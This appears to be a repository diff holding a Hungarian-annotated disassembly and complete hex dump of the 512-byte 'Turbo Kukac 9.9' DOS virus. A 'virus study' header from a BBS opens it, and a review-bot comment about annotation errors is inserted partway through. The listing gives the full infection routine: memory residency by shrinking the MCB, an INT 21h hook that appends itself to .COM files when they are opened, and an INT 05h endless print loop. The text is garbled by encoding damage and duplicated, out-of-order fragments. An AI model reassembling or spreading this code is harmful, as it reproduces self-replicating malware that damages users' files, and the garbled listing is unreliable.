28F8:0249 B90400 MOV CX,0004 ;4 byte
|
||||
28F8:024C BAC102 MOV DX,02C1 ;ide tegye
|
||||
28F8:024F 8CCF MOV DI,CS
|
||||
28F8:0251 8EDF MOV DS,DI ;DS=CS
|
||||
28F8:0253 E85A00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0256 B005 MOV AL,05
|
||||
28F8:0258 3A06C402 CMP AL,[02C4] ;utols˘ byte=5 ?
|
||||
28F8:025C 7443 JZ 02A1 ;igen, ugr s az eredeti
|
||||
;INT 21h -ra
|
||||
|
||||
;Fert”zend” file-ba a virusra
|
||||
;mutat˘ JMP+op. kiˇr sa (4 byte)
|
||||
|
||||
28F8:025E B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:0260 B000 MOV AL,00 ;file elej‚re
|
||||
28F8:0262 B90000 MOV CX,0000
|
||||
28F8:0265 8BD1 MOV DX,CX
|
||||
28F8:0267 E84600 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:026A B0E9 MOV AL,E9 ;JMP k˘dja
|
||||
28F8:026C 2E CS:
|
||||
28F8:026D A2BD02 MOV [02BD],AL ;let rolja
|
||||
28F8:0270 B005 MOV AL,05
|
||||
28F8:0272 2E CS:
|
||||
28F8:0273 A2C002 MOV [02C0],AL
|
||||
28F8:0276 B90400 MOV CX,0004 ;4 byte
|
||||
28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete
|
||||
28F8:027C 8CC8 MOV AX,CS
|
||||
28F8:027E 8ED8 MOV DS,AX
|
||||
28F8:0280 B440 MOV AH,40 ;kiˇr s file-ba
|
||||
28F8:0282 E82B00 CALL 02B0 ;INT 21h hiv sa
|
||||
|
||||
;Program megfert”z‚se 0200h byte kiˇr sa
|
||||
;azaz a virus m”g‚m sol sa
|
||||
|
||||
28F8:0285 B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:0287 B002 MOV AL,02 ;file v‚g‚re
|
||||
28F8:0289 B90000 MOV CX,0000
|
||||
28F8:028C 8BD1 MOV DX,CX
|
||||
28F8:028E E81F00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-t”l
|
||||
28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza
|
||||
28F8:0297 B440 MOV AH,40 ;kiˇr s file-ba
|
||||
28F8:0299 E81400 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:029C B43E MOV AH,3E ;file z r sa
|
||||
28F8:029E E80F00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:02A1 5E POP SI
|
||||
28F8:02A2 5F POP DI
|
||||
28F8:02A3 5A POP DX
|
||||
28F8:02A4 59 POP CX
|
||||
28F8:02A5 5B POP BX
|
||||
28F8:02A6 58 POP AX
|
||||
28F8:02A7 07 POP ES
|
||||
28F8:02A8 1F POP DS
|
||||
|
||||
28F8:02A9 90 NOP
|
||||
28F8:02AA 2E CS:
|
||||
28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra
|
||||
28F8:02AF CF IRET
|
||||
;Eredeti INT 21h hiv sa
|
||||
28F8:02B0 9C PUSHF ;elmenti mivel az IRET
|
||||
;visszamenti a flag-eket
|
||||
28F8:02B1 2E CS:
|
||||
28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hiv sa
|
||||
28F8:02B6 C3 RET
|
||||
|
||||
28F8:02B7 16 PUSH SS
|
||||
28F8:02B8 130C ADC CX,[SI]
|
||||
28F8:02BA 0202 ADD AL,[BP+SI]
|
||||
28F8:02BC 00E9 ADD CL,CH
|
||||
28F8:02BE 06 PUSH ES
|
||||
28F8:02BF 06 PUSH ES
|
||||
28F8:02C0 05E906 ADD AX,06E9
|
||||
28F8:02C3 0405 ADD AL,05
|
||||
28F8:02C5 0100 ADD [BX+SI],AX
|
||||
28F8:02C7 0000 ADD [BX+SI],AL
|
||||
28F8:02C9 0001 ADD [BX+DI],AL
|
||||
28F8:02CB F0 LOCK
|
||||
28F8:02CC 0901 OR [BX+DI],AX
|
||||
28F8:02CE 54 PUSH SP
|
||||
28F8:02CF 7572 JNZ 0343
|
||||
28F8:02D1 62 DB 62
|
||||
28F8:02D2 6F DB 6F
|
||||
28F8:02D3 204B75 AND [BP+DI+75],CL
|
||||
28F8:02D6 6B DB 6B
|
||||
28F8:02D7 61 DB 61
|
||||
28F8:02D8 63 DB 63
|
||||
28F8:02D9 2039 AND [BX+DI],BH
|
||||
28F8:02DB 2E CS:
|
||||
28F8:02DC 3920 CMP [BX+SI],SP
|
||||
28F8:02DE 2020 AND [BX+SI],AH
|
||||
28F8:02E0 2020 AND [BX+SI],AH
|
||||
28F8:02E2 2024 AND [SI],AH
|
||||
28F8:02E4 0000 ADD [BX+SI],AL
|
||||
|
||||
28F8:02FC 0000 ADD [BX+SI],AL
|
||||
28F8:02FE FA CLI
|
||||
28F8:02FF 00C7 ADD BH,AL
|
||||
|
||||
Megjegyz‚s:
|
||||
|
||||
Nagyon primitˇv virus, de megvan a maga zsenialit sa, k‚t legyet
|
||||
<EFBFBD>t egy csap sra, pl COPY parancs eset‚n megnyit egy com file-t,s
|
||||
ha a virus a mem˘ri ban van, akkor m‚g a m soland˘ file-t megfer-
|
||||
t”zi, s a COPY m r a fert”z”tt file-t m solja! Nem igaz n k r-
|
||||
t‚kony vˇrus, puszt n minden<EFBFBD>tt ott akar lenni, s nehezˇteni a
|
||||
felhaszn l˘(k) munk j t! M‚rete nagyon kicsi, mind”ssze 512 byte!
|
||||
Hi nyoznak a vˇrusb˘l az (tapasztalataim szerint) eddigi virusok-
|
||||
ban fellelhet” ellen”rz‚sek, gondolok itt arra, hogy ha megt”rt‚nik
|
||||
egy file-ba (hoz) val˘ kiˇr s nem ellen”rzi a program hogy val˘ban
|
||||
kiˇrta-e azt az X byte-ot. Tov bb mikor rezidess‚ (nem {hivatalo-
|
||||
san} bejegyzetten) teszi mag t nem m˘dosˇtja az MCB. 13. byte-j n
|
||||
l‚v” RAM tetej‚nek a paragrafus cˇm‚tt a saj t maga lltal lefog-
|
||||
lalt m‚rettel (kivon s!), mint PL. a Yankee Doodle! A Yankee m‚g
|
||||
azt is megn‚zi, hogy amit meg akar fert”zni az az utols˘ mem˘.
|
||||
blokkban van-e, b r abban kell lennie, mert a DOS egy programnak
|
||||
odaadja a teljes szabad mem˘ri t, ami van...
|
||||
|
||||
|
||||
DUMP:
|
||||
|
||||
28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..=
|
||||
28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............
|
||||
28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............
|
||||
28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H.....
|
||||
28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-..
|
||||
28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................
|
||||
28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l.............
|
||||
28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........
|
||||
28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!..
|
||||
28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................
|
||||
28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!.......
|
||||
28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................
|
||||
28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R.....
|
||||
28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t..
|
||||
28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV.....
|
||||
28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM&
|
||||
28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t.
|
||||
28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s.....
|
||||
28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=.
|
||||
28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B....
|
||||
28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?.......
|
||||
28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B
|
||||
28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F.......
|
||||
28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................
|
||||
28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B.........
|
||||
28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>..
|
||||
28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X.........
|
||||
28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................
|
||||
28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 ..............
|
||||
|
||||
;Kiˇrand˘ sz”veg kezdete
|
||||
28F8:02C0 54 75 Tu
|
||||
28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9
|
||||
28F8:02E0 20 20 20 24 $
|
||||
|
||||
28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............
|
||||
28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................
|
||||
28F8:0300 C7 .
|
||||
|
||||
;****************************************************************************;
|
||||
; ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] For All Your H/P/A/V Files [=- ;
|
||||
; -=] SysOp: Peter Venkman [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; ;
|
||||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||||
; ;
|
||||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||||
; Is. Keep This Code in Responsible Hands! ;
|
||||
; ;
|
||||
;****************************************************************************;
|
|
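Review bot: The annotation in this listing mislabels the saved interrupt vector: at `28F8:018F MOV [02B7],BX` and `28F8:0196 MOV [02B9],BX` the comments say "INT 05h offset/segment (régi)", but the vector was just fetched with AH=35h/AL=21h and [02B7] is the far pointer the hook chains through (`JMP FAR [02B7]` at 02AB, `CALL FAR [02B7]` at 02B2), so the comments should read `;old INT 21h offset` and `;old INT 21h segment`; the comment on `JMP FAR [02C5]` likewise says offset 01c6 while the stored entry point is 016C. The trailing dump excerpt also mislabels the "Tu" bytes as `28F8:02C0` although the disassembly and the main dump place the string at 02CE (02C0-02C4 hold 05 E9 06 04 05), and the zero run labelled 02E0 actually starts after the `$` at 02E3. The same 426-line listing appears to be added a second time in the following section, which looks like a duplicate upload worth confirming. Since the file is kept for analysis, a short English header summarising the detection characteristics the listing already establishes would help reviewers who do not read Hungarian: resident check via INT 21h segment >= 4000h, hook on AH=3Dh opens of `*.COM`, 05h at file offset 3 as the infection marker, FE00h size ceiling, 200h bytes appended, and INT 05h replaced by an endless "Turbo Kukac 9.9" print loop.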
@ -0,0 +1,426 @@
|
|||
;****************************************************************************;
|
||||
; ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] For All Your H/P/A/V Files [=- ;
|
||||
; -=] SysOp: Peter Venkman [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; ;
|
||||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||||
; ;
|
||||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||||
; Is. Keep This Code in Responsible Hands! ;
|
||||
; ;
|
||||
;****************************************************************************;
|
||||
TURBO KUKAC v9.9 virus unassembled list:
|
||||
`90.07.21.
|
||||
|
||||
Magyar zat: K”v ri L szl˘
|
||||
Tel.: (41) 21-822 07-13:20 mh.
|
||||
21-033 18:00-
|
||||
|
||||
|
||||
|
||||
28F8:0100 E80000 CALL 0103 ;IP ‚rt‚ke az SI-be
|
||||
28F8:0103 90 NOP ;ez lesz a b zis offset
|
||||
28F8:0104 5E POP SI
|
||||
28F8:0105 50 PUSH AX
|
||||
28F8:0106 51 PUSH CX
|
||||
28F8:0107 B021 MOV AL,21
|
||||
28F8:0109 B435 MOV AH,35
|
||||
28F8:010B CD21 INT 21 ;INT 21h cˇm‚nek lek‚r-
|
||||
;dez‚se
|
||||
28F8:010D 8CC0 MOV AX,ES
|
||||
28F8:010F 3D0040 CMP AX,4000 ;a mem˘ri ban van ?
|
||||
28F8:0112 7224 JB 0138 ;nincs!
|
||||
28F8:0114 83EE03 SUB SI,+03 ;b zis offset -3
|
||||
;(3 byte hosszu a JMP
|
||||
;+ az operandusa!)
|
||||
28F8:0117 BAC102 MOV DX,02C1
|
||||
28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levon sa
|
||||
;(COM file saj toss ga!)
|
||||
28F8:011E 03F2 ADD SI,DX
|
||||
28F8:0120 8B1C MOV BX,[SI] ;JMP k˘dja + az operan-
|
||||
;dus fele
|
||||
28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte
|
||||
28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet
|
||||
28F8:0129 890E0201 MOV [0102],CX ;let rol sa
|
||||
28F8:012D 8CD8 MOV AX,DS
|
||||
28F8:012F 8EC0 MOV ES,AX ;ES=DS
|
||||
28F8:0131 59 POP CX
|
||||
28F8:0132 58 POP AX
|
||||
28F8:0133 BB0001 MOV BX,0100 ;ugr s offset-je
|
||||
28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM V<>GRE-
|
||||
;HAJTŹSA
|
||||
|
||||
;HA M<>G NINCS A MEM˘RIŹBAN
|
||||
28F8:0138 8CD8 MOV AX,DS ;saj t szegmense
|
||||
28F8:013A 48 DEC AX ;saj t seg-1= MCB. seg.
|
||||
28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense
|
||||
28F8:013D A10300 MOV AX,[0003] ;DOS lltal a programnak
|
||||
;foglalt mem˘riablokk
|
||||
;hossza
|
||||
28F8:0140 2D4100 SUB AX,0041 ;virus hossz t levonja
|
||||
;bel”le (41*16 byte)
|
||||
28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS
|
||||
; lltal l tott teljes
|
||||
;mem˘ria nagys ga a prg.
|
||||
;kil‚p‚se ut n (41*16
|
||||
;byte-tal) kevesebb lesz
|
||||
;Hasonl˘an csin lja ezt
|
||||
;a YANKEE DOODLE is, s
|
||||
;ezzel azt ‚ri el, hogy
|
||||
;semmilyen
|
||||
;System Storage Map
|
||||
;programmal nem mutat-
|
||||
;hat˘ ki a virus jele-
|
||||
;l‚te a mem˘ri ban!
|
||||
;A PCTOOLS system info
|
||||
;kimutatja, azaz csak
|
||||
;annyit l tni, hogy a
|
||||
;fizikai RAM m‚ret 640K
|
||||
;s a DOS lltal l tott
|
||||
;az 639k byte! Igy k”-
|
||||
;vetkeztetni lehet...
|
||||
28F8:0146 8CC8 MOV AX,CS
|
||||
28F8:0148 8ED8 MOV DS,AX ;DS=CS
|
||||
28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej‚-
|
||||
;nek a paragrafuscˇme
|
||||
28F8:014D 2D0008 SUB AX,0800
|
||||
28F8:0150 8EC0 MOV ES,AX ;virus Łj szegmense
|
||||
28F8:0152 BF0001 MOV DI,0100
|
||||
28F8:0155 83EE03 SUB SI,+03
|
||||
28F8:0158 B90002 MOV CX,0200 ;virus hossza
|
||||
28F8:015B F3 REPZ
|
||||
28F8:015C A4 MOVSB ;virus m sol sa az Łj
|
||||
;szegmensbe
|
||||
28F8:015D 8C06C702 MOV [02C7],ES ;Łj szegmens t rol sa
|
||||
28F8:0161 B96C01 MOV CX,016C ;bel‚p‚si pont
|
||||
28F8:0164 890EC502 MOV [02C5],CX ;t rol sa
|
||||
28F8:0168 FF2EC502 JMP FAR [02C5] ;ugr s az Łj szegmens
|
||||
;01c6 offset-‚re
|
||||
;UJ SZEGMENSBEN A BEL<45>P<EFBFBD>SI PONT
|
||||
28F8:016C 8CC1 MOV CX,ES
|
||||
28F8:016E 8CD8 MOV AX,DS ;ahonnan m solta mag t
|
||||
28F8:0170 26 ES:
|
||||
28F8:0171 A3CB02 MOV [02CB],AX ;R<>GI PRG. segment cˇm
|
||||
28F8:0174 B80001 MOV AX,0100
|
||||
28F8:0177 26 ES:
|
||||
28F8:0178 A3C902 MOV [02C9],AX ;0100h offset t rol sa
|
||||
28F8:017B 8CC0 MOV AX,ES
|
||||
28F8:017D 8ED8 MOV DS,AX
|
||||
28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY Łj
|
||||
;offset-je
|
||||
28F8:0182 B005 MOV AL,05
|
||||
28F8:0184 B425 MOV AH,25
|
||||
28F8:0186 CD21 INT 21 ;INT 05 ellop sa
|
||||
28F8:0188 B435 MOV AH,35
|
||||
28F8:018A B021 MOV AL,21
|
||||
28F8:018C CD21 INT 21 ;INT 21h cˇm lek‚rdez‚-
|
||||
;se
|
||||
28F8:018E 2E CS:
|
||||
28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (r‚gi)
|
||||
28F8:0193 8CC3 MOV BX,ES
|
||||
28F8:0195 2E CS:
|
||||
28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (r‚gi)
|
||||
28F8:019A B8D901 MOV AX,01D9 ;Łj INT 21h offset cˇm
|
||||
28F8:019D 8BD0 MOV DX,AX
|
||||
28F8:019F 8BC1 MOV AX,CX
|
||||
28F8:01A1 8ED8 MOV DS,AX
|
||||
28F8:01A3 B021 MOV AL,21
|
||||
28F8:01A5 B425 MOV AH,25
|
||||
28F8:01A7 CD21 INT 21 ;INT 21h ellop sa
|
||||
28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ
|
||||
28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!!
|
||||
28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!!
|
||||
28F8:01B4 8ED8 MOV DS,AX
|
||||
28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP k˘dja
|
||||
28F8:01BA 890E0201 MOV [0102],CX ;‚s operandusa
|
||||
28F8:01BE 8EC0 MOV ES,AX
|
||||
28F8:01C0 59 POP CX
|
||||
28F8:01C1 58 POP AX
|
||||
28F8:01C2 2E CS:
|
||||
28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA-
|
||||
;TŹSA!
|
||||
;Łj INT 05 - HARD COPY rutin
|
||||
28F8:01C7 90 NOP
|
||||
28F8:01C8 50 PUSH AX
|
||||
28F8:01C9 1E PUSH DS
|
||||
28F8:01CA 52 PUSH DX
|
||||
28F8:01CB 8CC8 MOV AX,CS
|
||||
28F8:01CD 8ED8 MOV DS,AX
|
||||
;V<>GTELEN CIKLUS!
|
||||
28F8:01CF BACE02 MOV DX,02CE ;sz”veg kezdete
|
||||
;Turbo Kukac v9.9
|
||||
28F8:01D2 B409 MOV AH,09 ;print string
|
||||
28F8:01D4 E8D900 CALL 02B0 ;r‚gi INT 21h hiv sa
|
||||
28F8:01D7 EBF6 JMP 01CF ;Łjra!
|
||||
|
||||
;Łj INT 21h rutin
|
||||
28F8:01D9 90 NOP
|
||||
28F8:01DA 80FC3D CMP AH,3D ;file nyit sa alfunkci˘?
|
||||
28F8:01DD 7403 JZ 01E2 ;igen
|
||||
28F8:01DF E9C700 JMP 02A9 ;nem ugr sa az eredeti
|
||||
;INT 21h-ra
|
||||
28F8:01E2 90 NOP
|
||||
28F8:01E3 1E PUSH DS
|
||||
28F8:01E4 06 PUSH ES
|
||||
28F8:01E5 50 PUSH AX
|
||||
28F8:01E6 53 PUSH BX
|
||||
28F8:01E7 51 PUSH CX
|
||||
28F8:01E8 52 PUSH DX
|
||||
28F8:01E9 57 PUSH DI
|
||||
28F8:01EA 56 PUSH SI
|
||||
|
||||
;File kiterjeszt‚s ellen”rz‚se
|
||||
|
||||
28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete
|
||||
28F8:01ED 8CDE MOV SI,DS
|
||||
28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH
|
||||
; tv‚tele!)
|
||||
28F8:01F1 B000 MOV AL,00 ;PATH lez r˘ nulla
|
||||
28F8:01F3 B93200 MOV CX,0032 ;file secifik ci˘ hossza
|
||||
28F8:01F6 FC CLD ;el”re
|
||||
28F8:01F7 F2 REPNZ
|
||||
28F8:01F8 AE SCASB ;PATH lez r˘ 0 byte ke-
|
||||
;res‚se
|
||||
28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszt‚s
|
||||
;kezdet+1 pozici˘ra mu-
|
||||
;tat
|
||||
28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be
|
||||
28F8:01FF 26 ES:
|
||||
28F8:0200 3B05 CMP AX,[DI] ; 'OM' a v‚ge ?
|
||||
28F8:0202 7403 JZ 0207 ;igen val szin<69>leg COM
|
||||
;file
|
||||
28F8:0204 E99A00 JMP 02A1 ;nem COM ugr s az erede-
|
||||
;ti INT 21h-ra
|
||||
28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be
|
||||
28F8:020A 26 ES:
|
||||
28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ?
|
||||
28F8:020E 7403 JZ 0213 ;biztos hogy COM file!
|
||||
28F8:0210 E98E00 JMP 02A1 ;nem COM ugr s az erede-
|
||||
;ti INT 21h-ra
|
||||
;File nyit sa
|
||||
|
||||
28F8:0213 B43D MOV AH,3D ;file nyit s
|
||||
28F8:0215 B002 MOV AL,02 ;ˇr s/olvas s
|
||||
28F8:0217 E89600 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:021A 7303 JNB 021F ;ha nincs hiba
|
||||
28F8:021C E98200 JMP 02A1 ;hiba eset‚n ugr s az
|
||||
;eredeti INT 21h-ra
|
||||
28F8:021F 8BD8 MOV BX,AX ;file kezel”
|
||||
|
||||
;File m‚ret ellen”rz‚s
|
||||
|
||||
28F8:0221 B90000 MOV CX,0000
|
||||
28F8:0224 BA0000 MOV DX,0000
|
||||
28F8:0227 B002 MOV AL,02 ;file v‚g‚re
|
||||
28F8:0229 B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:022B E88200 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:022E 3D00FE CMP AX,FE00
|
||||
28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file
|
||||
;65024 byte-n l
|
||||
28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza
|
||||
|
||||
;Fert”zend” file eredeti 4 byte j nak
|
||||
;beolvas sa
|
||||
|
||||
28F8:0236 2E CS:
|
||||
28F8:0237 A3BE02 MOV [02BE],AX ;let rolja
|
||||
28F8:023A B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:023C B000 MOV AL,00 ;file elej‚re
|
||||
28F8:023E B90000 MOV CX,0000
|
||||
28F8:0241 BA0000 MOV DX,0000
|
||||
28F8:0244 E86900 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0247 B43F MOV AH,3F ;olvas s file-b˘l
|
||||
28F8:0249 B90400 MOV CX,0004 ;4 byte
|
||||
28F8:024C BAC102 MOV DX,02C1 ;ide tegye
|
||||
28F8:024F 8CCF MOV DI,CS
|
||||
28F8:0251 8EDF MOV DS,DI ;DS=CS
|
||||
28F8:0253 E85A00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0256 B005 MOV AL,05
|
||||
28F8:0258 3A06C402 CMP AL,[02C4] ;utols˘ byte=5 ?
|
||||
28F8:025C 7443 JZ 02A1 ;igen, ugr s az eredeti
|
||||
;INT 21h -ra
|
||||
|
||||
;Fert”zend” file-ba a virusra
|
||||
;mutat˘ JMP+op. kiˇr sa (4 byte)
|
||||
|
||||
28F8:025E B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:0260 B000 MOV AL,00 ;file elej‚re
|
||||
28F8:0262 B90000 MOV CX,0000
|
||||
28F8:0265 8BD1 MOV DX,CX
|
||||
28F8:0267 E84600 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:026A B0E9 MOV AL,E9 ;JMP k˘dja
|
||||
28F8:026C 2E CS:
|
||||
28F8:026D A2BD02 MOV [02BD],AL ;let rolja
|
||||
28F8:0270 B005 MOV AL,05
|
||||
28F8:0272 2E CS:
|
||||
28F8:0273 A2C002 MOV [02C0],AL
|
||||
28F8:0276 B90400 MOV CX,0004 ;4 byte
|
||||
28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete
|
||||
28F8:027C 8CC8 MOV AX,CS
|
||||
28F8:027E 8ED8 MOV DS,AX
|
||||
28F8:0280 B440 MOV AH,40 ;kiˇr s file-ba
|
||||
28F8:0282 E82B00 CALL 02B0 ;INT 21h hiv sa
|
||||
|
||||
;Program megfert”z‚se 0200h byte kiˇr sa
|
||||
;azaz a virus m”g‚m sol sa
|
||||
|
||||
28F8:0285 B442 MOV AH,42 ;file pointer mozgat sa
|
||||
28F8:0287 B002 MOV AL,02 ;file v‚g‚re
|
||||
28F8:0289 B90000 MOV CX,0000
|
||||
28F8:028C 8BD1 MOV DX,CX
|
||||
28F8:028E E81F00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-t”l
|
||||
28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza
|
||||
28F8:0297 B440 MOV AH,40 ;kiˇr s file-ba
|
||||
28F8:0299 E81400 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:029C B43E MOV AH,3E ;file z r sa
|
||||
28F8:029E E80F00 CALL 02B0 ;INT 21h hiv sa
|
||||
28F8:02A1 5E POP SI
|
||||
28F8:02A2 5F POP DI
|
||||
28F8:02A3 5A POP DX
|
||||
28F8:02A4 59 POP CX
|
||||
28F8:02A5 5B POP BX
|
||||
28F8:02A6 58 POP AX
|
||||
28F8:02A7 07 POP ES
|
||||
28F8:02A8 1F POP DS
|
||||
|
||||
28F8:02A9 90 NOP
|
||||
28F8:02AA 2E CS:
|
||||
28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra
|
||||
28F8:02AF CF IRET
|
||||
;Eredeti INT 21h hiv sa
|
||||
28F8:02B0 9C PUSHF ;elmenti mivel az IRET
|
||||
;visszamenti a flag-eket
|
||||
28F8:02B1 2E CS:
|
||||
28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hiv sa
|
||||
28F8:02B6 C3 RET
|
||||
|
||||
28F8:02B7 16 PUSH SS
|
||||
28F8:02B8 130C ADC CX,[SI]
|
||||
28F8:02BA 0202 ADD AL,[BP+SI]
|
||||
28F8:02BC 00E9 ADD CL,CH
|
||||
28F8:02BE 06 PUSH ES
|
||||
28F8:02BF 06 PUSH ES
|
||||
28F8:02C0 05E906 ADD AX,06E9
|
||||
28F8:02C3 0405 ADD AL,05
|
||||
28F8:02C5 0100 ADD [BX+SI],AX
|
||||
28F8:02C7 0000 ADD [BX+SI],AL
|
||||
28F8:02C9 0001 ADD [BX+DI],AL
|
||||
28F8:02CB F0 LOCK
|
||||
28F8:02CC 0901 OR [BX+DI],AX
|
||||
28F8:02CE 54 PUSH SP
|
||||
28F8:02CF 7572 JNZ 0343
|
||||
28F8:02D1 62 DB 62
|
||||
28F8:02D2 6F DB 6F
|
||||
28F8:02D3 204B75 AND [BP+DI+75],CL
|
||||
28F8:02D6 6B DB 6B
|
||||
28F8:02D7 61 DB 61
|
||||
28F8:02D8 63 DB 63
|
||||
28F8:02D9 2039 AND [BX+DI],BH
|
||||
28F8:02DB 2E CS:
|
||||
28F8:02DC 3920 CMP [BX+SI],SP
|
||||
